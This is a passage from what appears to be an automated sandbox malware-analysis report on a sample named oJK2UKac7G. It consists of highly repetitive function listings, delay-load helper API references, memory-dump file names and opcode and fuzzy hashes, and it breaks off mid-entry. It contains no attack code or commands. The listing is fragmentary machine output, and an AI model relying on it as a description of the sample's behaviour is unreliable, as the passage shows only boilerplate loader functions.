    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e7946300663c65c4dea07ab65af2ef571fc81136e83556ce4f3f71a84ff502f0
    • Instruction ID: 470bad2b79d4d183b0a6391288009fbe6b57828b10e5ae2ad2aedfb06a09abf2
    • Opcode Fuzzy Hash: e7946300663c65c4dea07ab65af2ef571fc81136e83556ce4f3f71a84ff502f0
    • Instruction Fuzzy Hash: 41B012C12782027C339461A5AC02F3B010CC0D5B16330C93FF202C0480E4601C822173
    Function 00CAFD48 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAFD5A
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: af41b259847b7bbe0ff71142fb7fdf980f01e7dd377bf183497cae44f7c1e10e
    • Instruction ID: 85639eadc0fe1e4ec64b8fc1be91ffa2ff74898e80ac2bc6af84218c8f2d9207
    • Opcode Fuzzy Hash: af41b259847b7bbe0ff71142fb7fdf980f01e7dd377bf183497cae44f7c1e10e
    • Instruction Fuzzy Hash: C4B012D52A85027C330521A16C02F37020CC4C1B16330863FF303C0040AC600C4A2072
    Function 00CAA235 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • DestroyWindow.USER32(?,00000000,00CAE640,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAA241
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: 33bee9be10498c52df5718af763cc56a5739492696b44ab02a2f2e6624492325
    • Instruction ID: c4a02990566439fbe1ab535d6f1775f3cd359889eaf795eae4bc940a4dfa548d
    • Opcode Fuzzy Hash: 33bee9be10498c52df5718af763cc56a5739492696b44ab02a2f2e6624492325
    • Instruction Fuzzy Hash: 2BC08C31011B208FC3310B04EA0839676E0AB00B16F00C81D90AA0646083B0A8A0CA40
    Function 00CAF3C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 526c8584f34e6e1e3e720fe5f99e7821e5bec8e32053000220d8484522bc8cd7
    • Instruction ID: bd5fb601a1c2dfeb23cce37f34a06e1c483e3e81297326c27d2be613ebdf78b5
    • Opcode Fuzzy Hash: 526c8584f34e6e1e3e720fe5f99e7821e5bec8e32053000220d8484522bc8cd7
    • Instruction Fuzzy Hash: CEA001962BA103BC3A4862A2AD16E3B022CC4EAB6A370893FF40385491B8A0194674B1
    Function 00CAF3A9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 24c4d518b0670db75fa07db666ad1fa959cc19274077686f5eaff8336030d58d
    • Instruction ID: bd5fb601a1c2dfeb23cce37f34a06e1c483e3e81297326c27d2be613ebdf78b5
    • Opcode Fuzzy Hash: 24c4d518b0670db75fa07db666ad1fa959cc19274077686f5eaff8336030d58d
    • Instruction Fuzzy Hash: CEA001962BA103BC3A4862A2AD16E3B022CC4EAB6A370893FF40385491B8A0194674B1
    Function 00CAF363 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 05b133587bf4a67b1f3d82b3b13f9210755be02311f68b35925f9fc8c3235843
    • Instruction ID: bd5fb601a1c2dfeb23cce37f34a06e1c483e3e81297326c27d2be613ebdf78b5
    • Opcode Fuzzy Hash: 05b133587bf4a67b1f3d82b3b13f9210755be02311f68b35925f9fc8c3235843
    • Instruction Fuzzy Hash: CEA001962BA103BC3A4862A2AD16E3B022CC4EAB6A370893FF40385491B8A0194674B1
    Function 00CAF586 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1dc71d31354c851165bc35512287550221535f640bbbe23a513bd77dcfef0289
    • Instruction ID: b6d9c0e5f9a28ece20cb1f86794c8aaa7455c9aad6d67e2d6cc118861f4b0fba
    • Opcode Fuzzy Hash: 1dc71d31354c851165bc35512287550221535f640bbbe23a513bd77dcfef0289
    • Instruction Fuzzy Hash: 5DA002D55A91077D310465A67D16D37415CC4D9B55331453EF44385481659058472071
    Function 00CAF590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 8cd0301c28388ee9e9c25f36854e159d32de1cdab0a3e444192c3da2b529ffd1
    • Instruction ID: b6d9c0e5f9a28ece20cb1f86794c8aaa7455c9aad6d67e2d6cc118861f4b0fba
    • Opcode Fuzzy Hash: 8cd0301c28388ee9e9c25f36854e159d32de1cdab0a3e444192c3da2b529ffd1
    • Instruction Fuzzy Hash: 5DA002D55A91077D310465A67D16D37415CC4D9B55331453EF44385481659058472071
    Function 00CAF55E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3503a4ee3374e49b85ac803e72c5eda2e79b32ec078e82423396b160f18df945
    • Instruction ID: b6d9c0e5f9a28ece20cb1f86794c8aaa7455c9aad6d67e2d6cc118861f4b0fba
    • Opcode Fuzzy Hash: 3503a4ee3374e49b85ac803e72c5eda2e79b32ec078e82423396b160f18df945
    • Instruction Fuzzy Hash: 5DA002D55A91077D310465A67D16D37415CC4D9B55331453EF44385481659058472071
    Function 00CAF554 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9df35b71455d7eb9fc93bd7837ab7008ef39b0870573e999d92c71660a5656d1
    • Instruction ID: b6d9c0e5f9a28ece20cb1f86794c8aaa7455c9aad6d67e2d6cc118861f4b0fba
    • Opcode Fuzzy Hash: 9df35b71455d7eb9fc93bd7837ab7008ef39b0870573e999d92c71660a5656d1
    • Instruction Fuzzy Hash: 5DA002D55A91077D310465A67D16D37415CC4D9B55331453EF44385481659058472071
    Function 00CAF57C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 91432716e6e84f5289996b4657f126c121a9e08f76b726ba7a56342570d2a6f1
    • Instruction ID: b6d9c0e5f9a28ece20cb1f86794c8aaa7455c9aad6d67e2d6cc118861f4b0fba
    • Opcode Fuzzy Hash: 91432716e6e84f5289996b4657f126c121a9e08f76b726ba7a56342570d2a6f1
    • Instruction Fuzzy Hash: 5DA002D55A91077D310465A67D16D37415CC4D9B55331453EF44385481659058472071
    Function 00CAF539 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4880da81cf9fb9c84bac74708fd123ef7f48b042ecd198fb7efff29c90e2cf08
    • Instruction ID: 69caca51c7c3971ca59ace25deaa977ea5fbd27371b7dc202afcfc7a15cfdde9
    • Opcode Fuzzy Hash: 4880da81cf9fb9c84bac74708fd123ef7f48b042ecd198fb7efff29c90e2cf08
    • Instruction Fuzzy Hash: 65A012C11A40063D310425A27D12D37010CC0D5B15331413EF00280080649008072070
    Function 00CAF6C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e01cd07a882674d1e77174c9b39bd8e1ec458e2bba143f93361dcdd9681245d1
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: e01cd07a882674d1e77174c9b39bd8e1ec458e2bba143f93361dcdd9681245d1
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    Function 00CAF6DB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 5787decd7b3d9aa15a7c9adc7e0bc9c258023f6d69ca2750fbd3542e36d1e4b7
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: 5787decd7b3d9aa15a7c9adc7e0bc9c258023f6d69ca2750fbd3542e36d1e4b7
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    Function 00CAF6D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: f45090042a106229dc731a9d5f78712fcd1851974fa5895e0b31686c9239617f
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: f45090042a106229dc731a9d5f78712fcd1851974fa5895e0b31686c9239617f
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    Function 00CAF6EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
